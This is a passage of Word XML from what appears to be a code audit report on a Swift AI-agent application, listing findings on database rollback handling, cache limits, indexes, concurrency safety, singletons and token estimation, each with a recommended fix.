          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">#17  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E67E22"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">[HIGH] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Silent Rollback Failure in Transactions</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Storage/MemoryDatabase.swift</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="888888"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">  (lines 567)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">ROLLBACK failures are suppressed with try? inside the catch block. A failed rollback indicates database corruption or lock contention, which is silently masked.</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Log ROLLBACK failures at error level. Consider adding corruption detection and recovery logic.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="E67E22" w:sz="4" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E67E22"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">#18  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E67E22"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">[HIGH] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Unbounded Context Cache Growth</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Services/Memory/MemoryContextAssembler.swift</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="888888"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">  (lines 21-75)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">The memory context cache has no size limit. With many agents (1000+), each storing 50KB+ context strings, this can exhaust memory. Only TTL-based expiry exists.</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Add LRU eviction with a maximum of 100 entries. Track access order and evict least-recently-used entries when the limit is reached.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="E67E22" w:sz="4" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E67E22"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">#19  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E67E22"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">[HIGH] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Missing Database Indexes for Common Queries</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Storage/MemoryDatabase.swift</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="888888"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">  (lines 1007, 1020)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Archive operations query by (agent_id, status, last_accessed, access_count) without a covering index. Aggregation GROUP BY queries also lack indexes. These cause full table scans on potentially thousands of rows.</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Add composite indexes: CREATE INDEX idx_entries_agent_status_accessed ON memory_entries(agent_id, status, last_accessed DESC, access_count ASC).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="E67E22" w:sz="4" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E67E22"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">#20  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E67E22"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">[HIGH] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Unsafe Task Cancellation Without Await</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Services/Memory/MemoryService.swift</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="888888"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">  (lines 146-147)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Task.cancel() is called on summary tasks without awaiting completion. The cancelled task may still be writing to the database when subsequent operations proceed, causing partial writes.</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After calling cancel(), await a brief sleep or use a cooperative cancellation checkpoint before proceeding with new operations.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="F39C12" w:sz="4" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="F39C12"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">#21  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="F39C12"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">[MEDIUM] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">No Duplicate Summary Detection</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Storage/MemoryDatabase.swift</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="888888"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">  (lines 1095-1115)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">insertSummaryAndMarkProcessed() has no ON CONFLICT clause or unique constraint. Network retries or bugs can insert duplicate summaries for the same conversation.</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Add UNIQUE INDEX on (agent_id, conversation_id) and use INSERT OR REPLACE.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="F39C12" w:sz="4" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="F39C12"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">#22  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="F39C12"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">[MEDIUM] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Null Pointer in PendingSignal Deserialization</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Storage/MemoryDatabase.swift</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="888888"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">  (lines 1431-1435)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">The assistantMessage column can be NULL (optional for user edits), but is read with String(cString:) without a null guard, risking a crash.</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Use sqlite3_column_text(stmt, 5).map { String(cString: $0) } for the assistantMessage field.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="200" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B4F72"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">4. Service Layer &amp; Managers</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">The inference pipeline, chat engine, work engine, model routing, background task management, and manager lifecycle were audited for architectural soundness, performance, and concurrency safety.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="C0392B" w:sz="4" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">#23  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">[CRITICAL] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Pervasive nonisolated(unsafe) Bypasses Actor Safety</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Multiple (11 files)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="888888"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">  (lines Various)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Critical managers and services use nonisolated(unsafe) to store mutable state accessed from different execution contexts (WorkEngine, ModelRuntime, ScheduleManager, WatcherManager). This bypasses Swift 6 actor isolation and creates potential undefined behavior.</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Refactor to pass state through function parameters or use AsyncStream for communication. Eliminate nonisolated(unsafe) by restructuring data flow.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="C0392B" w:sz="4" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">#24  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">[CRITICAL] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">30+ Singletons with No Dependency Injection</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All Managers/Services</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="888888"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">  (lines N/A)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Every major component uses static let shared. ChatEngine directly calls RemoteProviderManager.shared, making it impossible to swap implementations for testing, run tests in parallel, or mock dependencies.</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Introduce a lightweight dependency container. Accept dependencies via initializer parameters. Define protocols for all service interfaces.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="E67E22" w:sz="4" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E67E22"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">#25  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E67E22"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">[HIGH] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">MainActor Deadlock Risk in ChatEngine Stream</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Services/Chat/ChatEngine.swift</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="888888"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">  (lines 66, 277)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Inside an AsyncThrowingStream producer (running on cooperative thread pool), await MainActor.run {} is called to fetch remote services. If the MainActor is waiting for stream results, this creates a classic A-waits-B-waits-A deadlock.</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Fetch remote services BEFORE creating the stream, in the caller context. Pass the service list as a parameter to the stream producer.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="F39C12" w:sz="4" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="F39C12"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">#26  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="F39C12"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">[MEDIUM] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Generic NSError Instead of Typed Errors</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Services/Inference/MLXService.swift</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="888888"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">  (lines 146-159)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Errors use NSError with magic domain strings and numeric codes. No typed error enum exists, making pattern matching impossible and debugging difficult.</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Define enum MLXServiceError: LocalizedError with specific cases. Replace all NSError instantiations.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="F39C12" w:sz="4" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="F39C12"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">#27  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="F39C12"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">[MEDIUM] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Crude Token Estimation (chars/4)</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Multiple files</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="888888"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">  (lines Various)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Token counting uses total/4 character heuristic across ChatEngine, MethodService, and context budgeting. This is wildly inaccurate for many models and languages, making context window budgets unreliable.</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Create a shared TokenCounter service that lazy-loads the actual tokenizer for the selected model. Cache token counts per-message.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="F39C12" w:sz="4" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="F39C12"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">#28  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="F39C12"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">[MEDIUM] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Unbounded Background Task Spawning</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Managers/BackgroundTaskManager.swift</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="888888"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">  (lines 38-56)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">No limit on concurrent background tasks. Auto-finalize timers accumulate. View update throttling is global, not per-task.</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Add a configurable maximum concurrent task limit. Auto-cleanup timers on completion. Implement per-task progress throttling.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="F39C12" w:sz="4" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="F39C12"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">#29  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="F39C12"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">[MEDIUM] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">State Fragmentation Across 5 Objects</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Managers/ExecutionContext.swift</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="888888"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">  (lines 33-34)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Execution state is split across ChatSession, WorkSession, ExecutionContext, BackgroundTaskState, and ChatWindowState with manual copying between them. No single source of truth.</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Create a unified ExecutionState struct. Use Combine publishers for state updates. Make BackgroundTaskState an observer, not a copy.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="200" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B4F72"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">5. Tools, Plugins &amp; Sandbox Security</w:t>
      </w:r>
    </w:p>
    <w:p>
